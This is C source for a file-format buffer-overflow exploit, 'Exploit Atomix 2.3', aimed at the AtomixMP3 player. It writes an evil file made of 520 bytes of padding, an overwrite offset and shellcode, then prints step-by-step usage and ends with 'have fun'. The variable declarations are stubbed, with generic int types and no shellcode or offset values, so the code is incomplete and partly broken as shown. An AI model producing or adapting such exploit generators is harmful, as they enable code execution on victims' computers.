
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int evilbuffer ;
 int fclose (int *) ;
 char* file ;
 int * fopen (char*,char*) ;
 int fwrite (int ,int ,int,int *) ;
 int memset (int ,char,int) ;
 char* offset ;
 int printf (char*,...) ;
 char* shellcode ;
 int strcat (int ,char*) ;
 int strcpy (int ,int ) ;
 int strlen (int ) ;
 int temp ;

int main(){
    printf("\n\n##################################################\n");
    printf("######\n");
    printf("######          Exploit Atomix 2.3\n");
    printf("######             By Preth00nker\n");
    printf("######     Preth00nker [at] gmail [dot] com\n");
    printf("######         http://www.mexhackteam.org\n\n\n");
    printf("######         http://www.prethoonker.tk\n\n\n");
    FILE *fich;
    memset(evilbuffer,'M',520);
    fich=fopen(file,"w+");
    printf(" (*) Creating the file: %s\n", file);
    strcpy(temp,evilbuffer);
    printf(" (*) Adding the evilbuffer\n");
    strcat(temp,offset);
    printf(" (*) Adding the Offset: %s\n", offset);
    strcat(temp,shellcode);
    printf(" (*) Adding the Sellcode\n");
    fwrite(temp, strlen(temp),1, fich);
    printf(" (*) Writting into the file\n");
    printf("      [ Usage: ]\n");
    printf("Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \n");
    printf("Step 2.- Run atomixmp3.exe\n");
    printf("Step 3.- Click On Search module and Click (again) on the unique file found.\n");
    printf("have fun =)!");
    fclose(fich);
    return 0;
}
